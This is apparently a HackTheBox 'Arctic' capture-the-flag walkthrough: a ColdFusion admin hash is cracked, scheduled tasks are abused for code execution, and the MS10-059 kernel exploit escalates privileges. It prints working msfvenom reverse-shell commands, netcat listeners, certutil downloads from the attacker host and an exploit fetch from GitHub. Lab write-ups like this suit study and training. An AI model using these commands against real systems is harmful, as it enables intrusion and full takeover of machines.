Hackthebox - Arctic
Windows
Nmap
FMTP
I find this fmtp protocol quite odd. Google was kinda frustrating on this so I just decided to try and go to the service with the browser: http://10.10.10.11:8500/
Let's try to get all files and folders with
wget -r --no-parent http://10.10.10.11:8500/
(it will take a while)The files seem to be related to coldfusion which is an adobe tool to develop web app.
These slides by Chris Gates about coldfusion are very useful. This wiki by nets.ec is also very useful
Another useful article here
We have a login panel here: http://10.10.10.11:8500/CFIDE/administrator/
We have the hash of the admin
If we go on crackstation.net we can easily find the password
happyday
We can then connect to the panel
If we follow the slides by Chris Gates (page 85), turns out we can get rce using the schedule tasks
Let's make a reverse shell exe file with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe
if you catch it with meterpreter ormsfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe
if you catch it with netcatSet up a listener
rlwrap nc -lvp 4444
We server our exe
python3 -m http.server 80
Now to execute it we have to click on "Schedule New Task" let's make it every minute and a half (has to be greater than 60 seconds)
the url is going to be
http://10.10.14.2/shell.exe
For some reason the chars were written in greek so I had to write am and pm in greek... I do not speak greek at all but google showed me how to write
am
in greek. See here: https://www.proz.com/kudoz/english-to-greek/general-conversation-greetings-letters/684823-am-pm.html
NOTE: I found out later that the time does not matter we can basically manually launch the tasks
Ok another try without the greek chars cause it does not seem to work as well so if I type ony
08:30
instead of8:37 πμ
the task is scheduled.
Now let's do our system probe (page 87 of the slides)
I do not get a shell this way either with meterpreter or nc even though the files are being fetch from my http server.
Let's try to upload another type of payload and execute it through the directory listing misconfiguration. Let's try jsp (according to the doc "ColdFusion pages and JSP pages can interoperate in several ways" see here )
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=5555 -f raw > shell.jsp
We generate our jsp shellrlwrap nc -lvp 5555
we set our listenerWe upload it to our target with the scheduled Task
This time our URL is
http://10.10.14.2/shell.jsp
Let's click on it and pray to catch the shell this time :)
We get a shell as tolis
Another way (without needing the password) would also have been to use Metasploit or a script like this one
We would take the python script in our target,
Generate the jsp with msfvenom,
Setup our listener,
And launch the python script that will upload our shell to the target
Navigate to the page with our shell
Privesc
Let's make a systeminfo and copy the output in a file to find an exploit
We can use Windows exploit suggester on it
wes --update
first we update the dbThen we pass it our file
wes sysinfo.txt
We can focus on privesc with this command
wes sysinfo.txt | grep -A8 "Elevation of Privilege"
We have this here which is also MS10-059
Let's take the exploit in our attacking machine
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
We serve it with python web server
We take it in our target
certutil.exe -urlcache -f http://10.10.14.2/MS10-059.exe MS10-059.exe
We set up a listener
rlwrap nc -lvp 5556
MS10-059.exe 10.10.14.2 5556
we run our exploit (we wait a little)
Last updated